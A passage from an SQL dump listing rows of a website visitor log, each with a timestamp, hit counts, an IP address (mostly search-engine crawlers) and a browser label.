36.149.99','other'),(333552,1542347136,1,1,0,0,'54.36.149.8','other'),(333553,1542347340,1,1,0,0,'54.36.149.51','other'),(333554,1542347432,8,8,0,0,'216.244.66.241','other'),(333555,1542347538,1,0,1,0,'66.249.69.200',''),(333556,1542347642,1,1,0,0,'54.36.149.83','other'),(333557,1542347717,1,1,0,0,'54.36.148.156','other'),(333558,1542347799,1,1,0,0,'54.36.148.63','other'),(333559,1542348202,1,1,0,0,'54.36.149.30','other'),(333560,1542348257,2,2,0,0,'54.36.149.75','other'),(333561,1542348447,1,1,0,0,'54.36.148.30','other'),(333562,1542348587,1,1,0,0,'207.46.13.207','other'),(333563,1542349143,1,1,0,0,'157.55.39.212','other'),(333564,1542349200,2,2,0,0,'216.244.66.241','other'),(333565,1542349249,1,1,0,0,'54.36.148.167','other'),(333566,1542349488,1,1,0,0,'188.163.124.219','firefox'),(333567,1542349508,1,1,0,0,'54.36.148.98','other'),(333568,1542349538,1,1,0,0,'131.228.182.250','other'),(333569,1542349542,1,1,0,0,'54.36.149.100','other'),(333570,1542349919,1,1,0,0,'54.36.148.246','other'),(333571,1542349931,1,1,0,0,'54.36.149.78','other'),(333572,1542349996,1,1,0,0,'95.163.255.94','other'),(333573,1542350000,1,1,0,0,'95.163.255.99','other'),(333574,1542350051,1,1,0,0,'54.36.148.100','other'),(333575,1542350327,1,1,0,0,'54.36.148.247','other'),(333576,1542350399,2,2,0,0,'216.244.66.241','other'),(333577,1542350494,1,1,0,0,'46.229.168.141','other'),(333578,1542350598,1,1,0,0,'66.249.69.219','chrome'),(333579,1542350600,1,1,0,0,'66.249.69.204','chrome'),(333580,1542350618,1,1,0,0,'207.46.13.172','other'),(333581,1542350633,1,1,0,0,'54.36.148.183','other'),(333582,1542350898,1,1,0,0,'54.36.149.93','other'),(333583,1542350940,1,1,0,0,'40.77.167.192','other'),(333584,1542351022,1,1,0,0,'54.36.148.117','other'),(333585,1542351351,1,1,0,0,'207.46.13.169','other'),(333586,1542351494,1,1,0,0,'54.36.148.144','other'),(333587,1542351579,1,1,0,0,'66.249.69.200','chrome'),(333588,1542352053,1,1,0,0,'54.36.148.243','other'),(333589,1542352105,2,2,0,0,'66.249.69.144','chrome'),(333590,1542352106,1,1,0,0,'66.249.69.148','chrome'),(333591,1542352297,1,1,0,0,'40.77.167.198','other'),(333592,1542352342,1,1,0,0,'66.249.69.150','chrome'),(333593,1542352415,1,1,0,0,'54.36.149.77','other'),(333594,1542352486,1,1,0,0,'54.36.149.33','other'),(333595,1542352650,1,1,0,0,'207.46.13.172','other'),(333596,1542352699,1,1,0,0,'54.36.148.59','other'),(333597,1542352720,8,8,0,0,'216.244.66.241','other'),(333598,1542352837,1,1,0,0,'207.46.13.224','other'),(333599,1542352991,1,1,0,0,'54.36.148.114','other'),(333600,1542353081,1,1,0,0,'54.36.149.40','other'),(333601,1542353215,1,1,0,0,'54.36.149.2','other'),(333602,1542353246,1,1,0,0,'66.249.69.143','chrome'),(333603,1542353247,1,1,0,0,'66.249.69.148','chrome'),(333604,1542353271,1,1,0,0,'54.36.148.58','other'),(333605,1542353350,2,2,0,0,'91.196.178.69','firefox'),(333606,1542353424,2,2,0,0,'91.209.11.236','other'),(333607,1542353538,1,1,0,0,'54.36.148.22','other'),(333608,1542353607,1,1,0,0,'8.29.198.26','other'),(333609,1542353638,1,1,0,0,'46.229.168.138','other'),(333610,1542353642,1,1,0,0,'46.229.168.153','other'),(333611,1542353671,1,1,0,0,'54.36.148.14','other'),(333612,1542353735,1,1,0,0,'40.77.167.183','other'),(333613,1542353767,1,1,0,0,'54.36.149.10','other'),(333614,1542353799,1,1,0,0,'66.249.93.205','chrome'),(333616,1542353856,2,2,0,0,'66.249.69.150','chrome'),(333617,1542353977,1,1,0,0,'46.229.168.132','other'),(333618,1542354094,1,1,0,0,'54.36.148.42','other'),(333619,1542354194,1,1,0,0,'46.229.168.144','other'),(333620,1542354276,1,1,0,0,'54.36.148.23','other'),(333621,1542354365,1,1,0,0,'54.36.149.14','other'),(333622,1542354389,1,1,0,0,'54.36.148.155','other'),(333623,1542354520,2,2,0,0,'91.196.178.93','chrome'),(333624,1542354547,1,1,0,0,'54.36.149.0','other'),(333625,1542354583,1,1,0,0,'54.36.148.95','other'),(333626,1542354633,1,1,0,0,'54.36.148.139','other'),(333627,1542354677,1,1,0,0,'54.36.148.117','other'),(333628,1542355116,1,1,0,0,'54.36.148.38','other'),(333629,1542355129,1,1,0,0,'8.29.198.26','other'),(333630,1542355180,1,1,0,0,'66.249.69.150','chrome'),(333631,1542355242,1,1,0,0,'40.77.167.198','other'),(333632,1542355289,1,1,0,0,'46.229.168.152','other'),(333633,1542355301,1,1,0,0,'88.99.194.48','chrome'),(333634,1542355364,1,1,0,0,'54.36.148.167','other'),(333635,1542355582,1,1,0,0,'54.36.148.53','other'),(333636,1542355684,1,1,0,0,'54.36.148.23','other'),(333637,1542355728,1,1,0,0,'8.29.198.25','other'),(333638,1542355730,1,1,0,0,'66.249.69.200','chrome'),(333639,1542355762,1,1,0,0,'54.36.148.89','other'),(333640,1542355868,1,1,0,0,'66.249.69.148','chrome'),(333641,1542355989,1,1,0,0,'54.36.148.25','other'),(333642,1542356018,1,1,0,0,'54.36.148.113','other'),(333643,1542356071,1,1,0,0,'54.36.148.20','other'),(333644,1542356078,1,1,0,0,'54.36.148.75','other'),(333645,1542356087,3,3,0,0,'216.244.66.241','other'),(333646,1542356141,1,1,0,0,'54.36.148.119','other'),(333647,1542356175,1,1,0,0,'66.249.69.221','chrome'),(333648,1542356176,1,1,0,0,'66.249.69.202','chrome'),(333649,1542356238,1,1,0,0,'193.19.152.90','firefox'),(333650,1542356315,1,1,0,0,'95.163.255.95','other'),(333651,1542356318,1,1,0,0,'95.163.255.99','other'),(333652,1542356443,1,1,0,0,'54.36.149.41','other'),(333653,1542356612,1,1,0,0,'54.36.148.42','other'),(333654,1542356698,1,1,0,0,'66.249.69.200','chrome'),(333655,1542356787,1,1,0,0,'54.36.148.54','other'),(333656,1542356985,1,1,0,0,'66.249.69.144','chrome'),(333657,1542356986,1,1,0,0,'66.249.69.150','chrome'),(333658,1542357001,2,2,0,0,'141.8.183.23','other'),(333659,1542357089,1,1,0,0,'54.36.148.217','other'),(333660,1542357151,18,18,0,0,'178.154.244.29','other'),(333661,1542357154,1,1,0,0,'54.36.148.107','other'),(333662,1542357230,8,8,0,0,'178.154.244.11','other'),(333663,1542357242,3,3,0,0,'91.196.177.46','firefox'),(333664,1542357251,1,1,0,0,'66.249.69.143','chrome'),(333665,1542357252,1,1,0,0,'66.249.69.148','chrome'),(333666,1542357280,1,1,0,0,'54.36.148.152','other'),(333667,1542357310,1,1,0,0,'66.249.69.145','chrome'),(333668,1542357311,1,1,0,0,'66.249.69.149','chrome'),(333669,1542357325,1,1,0,0,'54.36.149.53','other'),(333670,1542357444,1,1,0,0,'54.36.148.194','other'),(333671,1542357449,1,1,0,0,'5.45.207.79','other'),(333672,1542357603,1,1,0,0,'93.158.166.7','other'),(333673,1542357615,1,1,0,0,'87.250.224.47','other'),(333674,1542357623,3,3,0,0,'178.154.171.27','other'),(333675,1542357624,4,4,0,0,'178.154.200.48','other'),(333676,1542357626,3,3,0,0,'213.180.203.17','other'),(333677,1542357628,1,1,0,0,'141.8.142.108','other'),(333678,1542357660,2,2,0,0,'178.154.244.65','other'),(333679,1542357680,2,2,0,0,'178.154.171.69','other'),(333680,1542357691,1,1,0,0,'141.8.142.81','other'),(333681,1542357704,1,1,0,0,'87.250.224.99','other'),(333682,1542357785,1,1,0,0,'46.229.168.135','other'),(333683,1542357787,1,1,0,0,'46.229.168.144','other'),(333684,1542357810,3,3,0,0,'141.8.142.65','other'),(333685,1542357822,1,1,0,0,'95.108.181.75','other'),(333686,1542357827,3,3,0,0,'141.8.183.22','other'),(333687,1542357954,1,1,0,0,'54.36.149.32','other'),(333688,1542357959,2,2,0,0,'178.154.244.21','other'),(333689,1542357986,2,2,0,0,'5.255.253.25','other'),(333690,1542358083,1,1,0,0,'95.108.181.94','other'),(333691,1542358131,2,2,0,0,'141.8.142.38','other'),(333692,1542358218,2,2,0,0,'95.108.213.4','other'),(333693,1542358283,1,1,0,0,'141.8.142.191','other'),(333694,1542358290,1,1,0,0,'194.44.253.138','chrome'),(333695,1542358299,1,1,0,0,'94.23.58.212','other'),(333696,1542358368,1,1,0,0,'46.229.168.153','other'),(333697,1542358370,1,1,0,0,'46.229.168.130','other'),(333698,1542358385,4,4,0,0,'216.244.66.241','other'),(333699,1542358396,1,1,0,0,'54.36.148.242','other'),(333700,1542358440,1,1,0,0,'66.249.69.202','chrome'),(333701,1542358542,1,1,0,0,'5.45.207.8','other'),(333702,1542358586,1,1,0,0,'54.36.148.122','other'),(333703,1542358673,1,1,0,0,'141.8.142.162','other'),(333704,1542358720,2,2,0,0,'91.124.182.170','firefox'),(333705,1542358754,1,1,0,0,'54.36.148.244','other'),(333706,1542358760,4,4,0,0,'178.154.244.11','other'),(333707,1542358780,1,1,0,0,'141.8.142.103','other'),(333708,1542358782,1,1,0,0,'5.45.207.79','other'),(333709,1542358788,3,3,0,0,'178.154.244.29','other'),(333710,1542358798,1,1,0,0,'207.46.13.207','other'),(333711,1542358800,1,1,0,0,'5.45.207.19','other'),(333712,1542358890,2,2,0,0,'95.47.107.121','chrome'),(333713,1542358897,2,2,0,0,'54.36.148.77','other'),(333714,1542358902,1,1,0,0,'194.44.253.138','other'),(333715,1542358926,1,1,0,0,'54.36.149.31','other'),(333716,1542358969,3,3,0,0,'91.196.178.93','chrome'),(333717,1542359040,1,1,0,0,'54.36.149.96','other'),(333718,1542359044,1,1,0,0,'54.36.148.135','other'),(333719,1542359120,1,1,0,0,'66.249.69.145','chrome'),(333721,1542359200,1,1,0,0,'54.36.148.182','other'),(333722,1542359201,1,1,0,0,'54.36.148.192','other'),(333723,1542359352,1,1,0,0,'194.44.253.138','chrome'),(333724,1542359383,2,2,0,0,'130.180.216.138','chrome'),(333725,1542359431,1,1,0,0,'95.163.255.99','other'),(333726,1542359435,1,1,0,0,'95.163.255.94','other'),(333727,1542359475,1,1,0,0,'54.36.148.137','other'),(333728,1542359583,1,1,0,0,'54.36.148.162','other'),(333729,1542359782,26,26,0,0,'66.249.69.200','chrome'),(333730,1542359800,1,1,0,0,'216.244.66.241','other'),(333731,1542359847,4,4,0,0,'66.249.69.204','chrome'),(333732,1542359882,11,11,0,0,'66.249.69.202','chrome'),(333733,1542360364,1,1,0,0,'54.36.148.214','other'),(333734,1542360669,1,1,0,0,'54.36.148.137','other'),(333735,1542360715,1,1,0,0,'54.36.148.252','other'),(333736,1542360789,4,4,0,0,'216.244.66.241','other'),(333737,1542360845,1,1,0,0,'54.36.148.57','other'),(333738,1542361022,1,1,0,0,'173.252.95.28','chrome'),(333739,1542361024,1,1,0,0,'173.252.95.18','chrome'),(333740,1542361161,1,1,0,0,'54.36.149.11','other'),(333741,1542361175,1,1,0,0,'80.252.154.233','firefox'),(333742,1542361200,1,1,0,0,'54.36.149.58','other'),(333743,1542361485,5,5,0,0,'66.249.69.204','chrome'),(333744,1542361651,2,2,0,0,'91.196.178.169','chrome'),(333745,1542361668,13,13,0,0,'66.249.69.202','chrome'),(333746,1542361744,1,1,0,0,'216.244.66.241','other'),(333747,1542361755,1,1,0,0,'54.36.149.40','other'),(333748,1542361760,2,2,0,0,'207.46.13.224','other'),(333749,1542361769,58,58,0,0,'66.249.69.200','chrome'),(333750,1542361773,1,1,0,0,'54.36.148.63','other'),(333751,1542361884,1,1,0,0,'95.163.255.93','other'),(333752,1542361887,1,1,0,0,'95.163.255.92','other'),(333753,1542361890,1,1,0,0,'54.36.148.18','other'),(333754,1542361954,1,1,0,0,'46.229.168.140','other'),(333755,1542362008,1,1,0,0,'54.36.148.216','other'),(333756,1542362119,1,1,0,0,'178.154.244.11','other'),(333757,1542362238,2,2,0,0,'54.36.148.79','other'),(333758,1542362493,2,2,0,0,'54.36.148.85','other'),(333759,1542362496,1,1,0,0,'54.36.148.160','other'),(333760,1542362502,2,2,0,0,'66.249.69.150','chrome'),(333761,1542362591,5,5,0,0,'66.249.69.204','chrome'),(333762,1542362650,10,10,0,0,'66.249.69.202','chrome'),(333763,1542362681,44,44,0,0,'66.249.69.200','chrome'),(333764,1542362785,1,1,0,0,'54.36.149.59','other'),(333765,1542362795,1,1,0,0,'54.36.148.107','other'),(333766,1542363253,1,1,0,0,'66.249.69.144','chrome'),(333767,1542363276,1,1,0,0,'40.77.167.198','other'),(333768,1542363537,1,1,0,0,'54.36.148.215','other'),(333769,1542363586,2,2,0,0,'54.36.148.40','other'),(333770,1542363624,1,1,0,0,'54.36.149.8','other'),(333771,1542363633,1,1,0,0,'54.36.148.49','other'),(333772,1542363651,1,1,0,0,'54.36.148.176','other'),(333773,1542363732,2,2,0,0,'216.244.66.241','other'),(333774,1542363750,1,1,0,0,'66.249.69.148','chrome'),(333775,1542363881,1,1,0,0,'54.36.148.82','other'),(333776,1542363903,15,15,0,0,'66.249.69.200','chrome'),(333777,1542363957,3,3,0,0,'66.249.69.202','chrome'),(333778,1542363962,4,4,0,0,'66.249.69.204','chrome'),(333779,1542364452,1,1,0,0,'8.29.198.26','other'),(333780,1542364701,1,1,0,0,'54.36.149.65','other'),(333781,1542364800,1,1,0,0,'46.229.168.153','other'),(333782,1542364803,1,1,0,0,'46.229.168.132','other'),(333783,1542364952,1,1,0,0,'54.36.148.66','other'),(333784,1542365005,1,1,0,0,'40.77.167.192','other'),(333785,1542365036,1,1,0,0,'54.36.148.72','other'),(333786,1542365083,1,1,0,0,'46.229.168.149','other'),(333787,1542365110,2,2,0,0,'66.249.69.204','chrome'),(333788,1542365143,1,1,0,0,'54.36.149.77','other'),(333789,1542365145,39,39,0,0,'66.249.69.200','chrome'),(333790,1542365203,1,1,0,0,'46.229.168.142','other'),(333791,1542365269,10,10,0,0,'66.249.69.202','chrome'),(333792,1542365270,1,1,0,0,'54.36.149.38','other'),(333793,1542365338,1,1,0,0,'54.36.148.90','other'),(333794,1542365441,1,1,0,0,'54.36.148.180','other'),(333795,1542365616,1,1,0,0,'66.249.69.144','chrome'),(333796,1542365617,1,1,0,0,'66.249.69.148','chrome'),(333797,1542365858,1,1,0,0,'93.79.36.105','msie'),(333798,1542365887,1,1,0,0,'54.36.148.158','other'),(333799,1542365968,1,1,0,0,'8.29.198.27','other'),(333800,1542366153,1,1,0,0,'54.36.149.27','other'),(333801,1542366181,1,1,0,0,'54.36.148.196','other'),(333802,1542366208,1,1,0,0,'54.36.149.71','other'),(333803,1542366421,3,3,0,0,'216.244.66.241','other'),(333804,1542366475,1,1,0,0,'40.77.167.183','other'),(333805,1542366512,1,1,0,0,'178.95.246.220','chrome'),(333806,1542366523,1,1,0,0,'54.36.149.30','other'),(333807,1542366536,1,1,0,0,'54.36.148.116','other'),(333808,1542366586,1,1,0,0,'54.36.148.63','other'),(333809,1542366587,1,1,0,0,'8.29.198.26','other'),(333810,1542366608,1,1,0,0,'66.249.69.144','chrome'),(333811,1542366610,1,1,0,0,'66.249.69.148','chrome'),(333812,1542366687,1,1,0,0,'54.36.148.230','other'),(333813,1542366753,1,1,0,0,'54.36.149.93','other'),(333814,1542366798,1,1,0,0,'54.36.148.138','other'),(333815,1542366934,4,4,0,0,'66.249.69.204','chrome'),(333816,1542366945,1,1,0,0,'46.229.168.146','other'),(333817,1542366963,1,1,0,0,'54.36.148.149','other'),(333818,1542366970,2,2,0,0,'91.196.178.134','firefox'),(333819,1542366988,1,1,0,0,'54.36.148.157','other'),(333820,1542367119,7,7,0,0,'66.249.69.202','chrome'),(333821,1542367136,7,7,0,0,'66.249.69.200','chrome'),(333822,1542367305,1,1,0,0,'54.36.148.128','other'),(333823,1542367429,1,1,0,0,'54.36.148.114','other'),(333824,1542367438,3,3,0,0,'66.249.75.16','chrome'),(333825,1542367439,1,1,0,0,'66.249.75.22','chrome'),(333826,1542367501,1,1,0,0,'54.36.148.74','other'),(333827,1542367527,2,2,0,0,'66.249.75.21','chrome'),(333828,1542367615,1,1,0,0,'66.249.69.148','chrome'),(333829,1542367686,1,1,0,0,'54.36.148.84','other'),(333830,1542367771,1,1,0,0,'54.36.148.15','other'),(333831,1542367786,1,1,0,0,'54.36.149.22','other'),(333832,1542367987,2,2,0,0,'66.249.75.17','chrome'),(333833,1542367988,2,2,0,0,'66.249.75.20','chrome'),(333834,1542368023,7,7,0,0,'66.249.69.202','chrome'),(333835,1542368070,10,10,0,0,'66.249.69.200','chrome'),(333836,1542368124,1,1,0,0,'54.36.148.203','other'),(333837,1542368130,5,5,0,0,'66.249.69.204','chrome'),(333838,1542368214,1,1,0,0,'54.36.148.85','other'),(333839,1542368265,1,1,0,0,'54.36.149.8','other'),(333840,1542368450,1,1,0,0,'54.36.148.213','other'),(333841,1542368542,1,1,0,0,'54.36.148.136','other'),(333842,1542368575,1,1,0,0,'207.46.13.172','other'),(333843,1542368642,1,1,0,0,'54.36.148.82','other'),(333844,1542368681,1,1,0,0,'66.249.75.22','chrome'),(333845,1542368700,1,1,0,0,'54.36.148.27','other'),(333846,1542368713,1,1,0,0,'54.36.148.43','other'),(333847,1542368759,4,4,0,0,'216.244.66.241','other'),(333848,1542368856,1,1,0,0,'54.36.149.44','other'),(333849,1542368862,1,1,0,0,'66.249.69.217','chrome'),(333850,1542368922,1,1,0,0,'66.249.69.221','chrome'),(333851,1542369034,1,1,0,0,'54.36.149.88','other'),(333852,1542369136,1,1,0,0,'54.36.148.184','other'),(333853,1542369216,1,1,0,0,'54.36.148.220','other'),(333854,1542369238,2,2,0,0,'66.249.69.200','chrome'),(333855,1542369253,1,1,0,0,'54.36.148.58','other'),(333856,1542369336,1,1,0,0,'66.249.75.16','chrome'),(333857,1542369337,1,1,0,0,'66.249.75.21','chrome'),(333858,1542369383,1,1,0,0,'66.249.69.219','chrome'),(333859,1542369431,1,1,0,0,'46.229.168.137','other'),(333860,1542369495,1,1,0,0,'66.249.69.204','chrome'),(333861,1542369587,1,1,0,0,'54.36.149.102','other'),(333862,1542369762,1,1,0,0,'66.249.69.202','chrome'),(333863,1542369825,1,1,0,0,'54.36.148.209','other'),(333864,1542369848,1,1,0,0,'94.178.39.215','chrome'),(333865,1542369883,1,1,0,0,'46.229.168.134','other'),(333866,1542369902,1,1,0,0,'54.36.149.90','other'),(333867,1542369975,3,3,0,0,'66.249.75.22','chrome'),(333868,1542369987,2,2,0,0,'66.249.75.20','chrome'),(333869,1542370288,1,1,0,0,'54.36.148.14','other'),(333870,1542370398,1,1,0,0,'54.36.148.36','other'),(333871,1542370413,1,1,0,0,'54.36.148.129','other'),(333872,1542370467,1,1,0,0,'54.36.148.32','other'),(333873,1542370520,2,2,0,0,'91.196.178.169','chrome'),(333874,1542370536,1,1,0,0,'66.249.75.16','chrome'),(333875,1542370618,3,3,0,0,'216.244.66.241','other'),(333876,1542370649,1,1,0,0,'95.163.255.97','other'),(333877,1542370652,1,1,0,0,'95.163.255.95','other'),(333878,1542370668,1,1,0,0,'46.229.168.142','other'),(333879,1542370674,1,1,0,0,'46.229.168.141','other'),(333880,1542370722,1,1,0,0,'54.36.148.131','other'),(333881,1542370791,1,1,0,0,'54.36.148.255','other'),(333882,1542370815,1,1,0,0,'54.36.149.35','other'),(333883,1542370879,1,1,0,0,'66.249.69.204','chrome'),(333884,1542370889,1,1,0,0,'46.229.168.133','other'),(333885,1542370979,1,1,0,0,'54.36.148.56','other'),(333886,1542371112,1,1,0,0,'54.36.149.4','other'),(333887,1542371187,1,1,0,0,'66.249.75.21','chrome'),(333888,1542371257,1,1,0,0,'54.36.148.145','other'),(333889,1542371417,1,1,0,0,'54.36.148.156','other'),(333890,1542371434,1,1,0,0,'66.249.69.200','chrome'),(333891,1542371595,3,3,0,0,'66.249.75.20','chrome'),(333892,1542371828,1,1,0,0,'207.46.13.207','other'),(333893,1542371858,2,2,0,0,'66.249.69.204','chrome'),(333894,1542371920,1,1,0,0,'54.36.148.49','other'),(333895,1542372050,1,1,0,0,'66.249.75.17','chrome'),(333896,1542372055,2,2,0,0,'66.249.75.15','chrome'),(333897,1542372069,1,1,0,0,'54.36.149.3','other'),(333898,1542372244,1,1,0,0,'54.36.148.132','other'),(333899,1542372288,3,3,0,0,'95.132.48.60','firefox'),(333900,1542372397,1,1,0,0,'54.36.148.250','other'),(333901,1542372577,1,1,0,0,'66.249.75.20','chrome'),(333902,1542372603,1,1,0,0,'54.36.149.61','other'),(333903,1542372648,1,1,0,0,'54.36.148.140','other'),(333904,1542372723,1,1,0,0,'54.36.148.117','other'),(333905,1542372842,1,1,0,0,'94.23.58.212','other'),(333906,1542372882,1,1,0,0,'54.36.148.147','other'),(333907,1542372959,2,2,0,0,'91.196.178.93','chrome'),(333908,1542373113,1,1,0,0,'54.36.149.94','other'),(333909,1542373123,2,2,0,0,'54.36.149.8','other'),(333910,1542373155,9,9,0,0,'178.154.244.11','other'),(333911,1542373173,19,19,0,0,'178.154.244.29','other'),(333912,1542373301,4,4,0,0,'5.45.207.79','other'),(333913,1542373314,1,1,0,0,'54.36.148.73','other'),(333914,1542373399,1,1,0,0,'87.250.224.65','other'),(333915,1542373478,1,1,0,0,'54.36.148.197','other'),(333916,1542373567,1,1,0,0,'54.36.148.164','other'),(333917,1542373609,1,1,0,0,'54.36.148.250','other'),(333918,1542373665,1,1,0,0,'54.36.148.136','other'),(333919,1542373675,1,1,0,0,'54.36.149.3','other'),(333920,1542373780,1,1,0,0,'54.36.148.27','other'),(333921,1542373823,1,1,0,0,'54.36.148.173','other'),(333922,1542373846,1,1,0,0,'5.45.207.19','other'),(333923,1542373868,1,1,0,0,'46.229.168.140','other'),(333924,1542373896,1,1,0,0,'54.36.149.105','other'),(333925,1542374039,6,6,0,0,'216.244.66.241','other'),(333926,1542374058,7,7,0,0,'178.154.244.11','other'),(333927,1542374075,1,1,0,0,'54.36.148.112','other'),(333928,1542374091,1,1,0,0,'54.36.148.192','other'),(333929,1542374097,10,10,0,0,'178.154.244.29','other'),(333930,1542374156,1,1,0,0,'66.249.75.21','chrome'),(333931,1542374162,1,1,0,0,'54.36.148.57','other'),(333932,1542374397,1,1,0,0,'66.249.69.204','chrome'),(333933,1542374557,1,1,0,0,'54.36.148.80','other'),(333934,1542374895,1,1,0,0,'54.36.148.223','other'),(333935,1542374960,1,1,0,0,'141.8.142.103','other'),(333936,1542374966,6,6,0,0,'178.154.244.11','other'),(333937,1542374969,1,1,0,0,'5.45.207.79','other'),(333938,1542375099,7,7,0,0,'178.154.244.29','other'),(333939,1542375194,1,1,0,0,'141.8.183.22','other'),(333940,1542375211,1,1,0,0,'5.255.253.16','other'),(333941,1542375230,1,1,0,0,'54.36.148.165','other'),(333942,1542375301,1,1,0,0,'8.29.198.25','other'),(333943,1542375407,1,1,0,0,'91.237.107.17','chrome'),(333944,1542375435,1,1,0,0,'54.36.148.212','other'),(333945,1542375458,1,1,0,0,'46.229.168.134','other'),(333946,1542375512,1,1,0,0,'54.36.149.35','other'),(333947,1542375580,3,3,0,0,'216.244.66.241','other'),(333948,1542375636,1,1,0,0,'66.249.75.22','chrome'),(333949,1542375801,1,1,0,0,'54.36.149.105','other'),(333950,1542375967,1,1,0,0,'54.36.148.142','other'),(333951,1542375991,1,1,0,0,'107.21.1.8','other'),(333952,1542375994,1,1,0,0,'54.208.102.37','other'),(333953,1542376020,1,1,0,0,'54.36.148.170','other'),(333954,1542376056,1,1,0,0,'40.77.167.183','other'),(333955,1542376158,1,1,0,0,'54.36.149.83','other'),(333956,1542376505,2,2,0,0,'207.46.13.172','other'),(333957,1542376625,1,1,0,0,'54.36.148.226','other'),(333958,1542376686,1,1,0,0,'66.249.75.22','chrome'),(333959,1542376789,1,1,0,0,'54.36.149.14','other'),(333960,1542376801,1,1,0,0,'54.36.149.65','other'),(333961,1542376818,2,2,0,0,'8.29.198.26','other'),(333962,1542376850,1,1,0,0,'54.36.148.191','other'),(333963,1542377034,1,1,0,0,'66.249.75.21','chrome'),(333964,1542377065,1,1,0,0,'54.36.149.103','other'),(333965,1542377147,1,1,0,0,'54.36.148.189','other'),(333966,1542377170,1,1,0,0,'207.46.13.169','other'),(333967,1542377309,1,1,0,0,'54.36.149.70','other'),(333968,1542377334,2,2,0,0,'40.77.167.183','other'),(333969,1542377806,2,2,0,0,'5.45.207.79','other'),(333970,1542377835,1,1,0,0,'5.45.207.19','other'),(333971,1542377894,1,1,0,0,'91.196.178.189','chrome'),(333972,1542377903,1,1,0,0,'54.36.148.124','other'),(333973,1542377962,1,1,0,0,'54.36.149.77','other'),(333974,1542377971,1,1,0,0,'157.55.39.212','other'),(333975,1542378105,1,1,0,0,'54.36.148.240','other'),(333976,1542378148,1,1,0,0,'54.36.148.247','other'),(333977,1542378228,1,1,0,0,'207.46.13.224','other'),(333978,1542378246,1,1,0,0,'54.36.148.207','other'),(333979,1542378587,1,1,0,0,'54.36.149.99','other'),(333980,1542378589,1,1,0,0,'178.154.244.29','other'),(333981,1542378611,1,1,0,0,'54.36.148.186','other'),(333982,1542378618,1,1,0,0,'54.36.149.23','other'),(333983,1542378640,1,1,0,0,'66.249.75.21','chrome'),(333984,1542378713,1,1,0,0,'95.163.255.97','other'),(333985,1542378716,1,1,0,0,'95.163.255.98','other'),(333986,1542378774,1,1,0,0,'207.46.13.172','other'),(333987,1542378783,1,1,0,0,'54.36.149.96','other'),(333988,1542378803,1,1,0,0,'54.36.149.21','other'),(333989,1542378806,1,1,0,0,'54.36.148.105','other'),(333990,1542378850,4,4,0,0,'216.244.66.241','other'),(333991,1542378864,1,1,0,0,'54.36.149.18','other'),(333992,1542378882,1,1,0,0,'54.36.149.100','other'),(333993,1542379139,1,1,0,0,'54.36.149.0','other'),(333994,1542379169,1,1,0,0,'54.36.149.52','other'),(333995,1542379188,2,1,1,0,'66.249.75.22',''),(333996,1542379247,1,0,1,0,'66.249.75.15',''),(333997,1542379406,1,1,0,0,'54.36.148.153','other'),(333998,1542379553,1,1,0,0,'178.255.215.94','other'),(333999,1542379692,2,2,0,0,'178.159.215.20','firefox'),(334000,1542379739,1,1,0,0,'5.45.207.19','other'),(334001,1542379743,1,1,0,0,'66.249.75.15','chrome'),(334002,1542379744,1,1,0,0,'66.249.75.20','chrome'),(334003,1542379823,1,1,0,0,'54.36.149.10','other'),(334005,1542379983,1,1,0,0,'54.36.149.97','other'),(334006,1542380045,1,1,0,0,'66.249.75.17','chrome'),(334008,1542380074,2,2,0,0,'66.249.75.21','chrome'),(334009,1542380173,1,1,0,0,'46.229.168.139','other'),(334010,1542380306,2,2,0,0,'46.229.168.135','other'),(334011,1542380331,2,2,0,0,'66.249.75.22','chrome'),(334012,1542380405,2,2,0,0,'54.36.148.39','other'),(334013,1542380448,1,1,0,0,'54.36.148.72','other'),(334014,1542380623,1,1,0,0,'66.249.69.200','chrome'),(334015,1542380658,1,1,0,0,'54.36.148.59','other'),(334016,1542380797,1,1,0,0,'54.36.148.200','other'),(334017,1542381174,1,1,0,0,'54.36.148.171','other'),(334018,1542381186,1,1,0,0,'54.36.148.122','other'),(334019,1542381197,1,1,0,0,'66.249.75.16','chrome'),(334020,1542381202,2,2,0,0,'66.249.75.15','chrome'),(334021,1542381214,1,1,0,0,'66.249.75.20','chrome'),(334022,1542381271,2,2,0,0,'216.244.66.241','other'),(334023,1542381429,1,1,0,0,'54.36.148.218','other'),(334024,1542381572,1,1,0,0,'54.36.149.11','other'),(334025,1542381705,1,1,0,0,'207.46.13.207','other'),(334026,1542381918,2,2,0,0,'217.69.143.217','firefox'),(334027,1542381975,1,1,0,0,'54.36.148.23','other'),(334028,1542382371,1,1,0,0,'54.36.148.46','other'),(334029,1542382594,1,1,0,0,'46.229.168.132','other'),(334030,1542382598,1,1,0,0,'46.229.168.138','other'),(334031,1542382663,2,2,0,0,'66.249.69.221','chrome'),(334032,1542382681,1,1,0,0,'66.249.75.21','chrome'),(334033,1542382955,1,1,0,0,'54.36.149.61','other'),(334034,1542383015,1,1,0,0,'54.36.148.242','other'),(334035,1542383052,1,1,0,0,'54.36.148.255','other'),(334036,1542383214,1,1,0,0,'66.249.69.200','chrome'),(334037,1542383299,1,1,0,0,'157.55.39.212','other'),(334038,1542383323,1,1,0,0,'54.36.148.240','other'),(334039,1542383479,1,1,0,0,'54.36.149.37','other'),(334040,1542383561,1,1,0,0,'54.36.148.82','other'),(334041,1542383585,1,1,0,0,'207.46.13.169','other'),(334042,1542383787,1,1,0,0,'54.36.148.124','other'),(334043,1542383832,1,1,0,0,'46.229.168.148','other'),(334044,1542383936,1,1,0,0,'54.36.148.181','other'),(334045,1542383973,1,1,0,0,'54.36.148.173','other'),(334046,1542383987,2,2,0,0,'85.90.201.23','chrome'),(334047,1542384095,4,4,0,0,'216.244.66.241','other'),(334048,1542384205,1,1,0,0,'54.36.148.155','other'),(334049,1542384357,1,1,0,0,'54.36.149.6','other'),(334050,1542384502,1,1,0,0,'66.249.75.17','chrome'),(334052,1542384512,1,1,0,0,'54.36.148.156','other'),(334053,1542384532,1,1,0,0,'54.36.149.102','other'),(334054,1542384849,1,1,0,0,'54.36.148.146','other'),(334055,1542385009,1,1,0,0,'54.36.148.225','other'),(334056,1542385015,1,1,0,0,'54.36.148.116','other'),(334057,1542385108,1,1,0,0,'216.244.66.241','other'),(334058,1542385309,1,1,0,0,'54.36.148.105','other'),(334059,1542385507,2,2,0,0,'66.249.75.20','chrome'),(334060,1542385573,1,1,0,0,'54.36.148.252','other'),(334061,1542385586,1,1,0,0,'207.46.13.169','other'),(334062,1542385655,1,1,0,0,'66.249.69.204','chrome'),(334063,1542385887,1,1,0,0,'54.36.149.29','other'),(334064,1542385974,1,1,0,0,'54.36.149.55','other'),(334065,1542386150,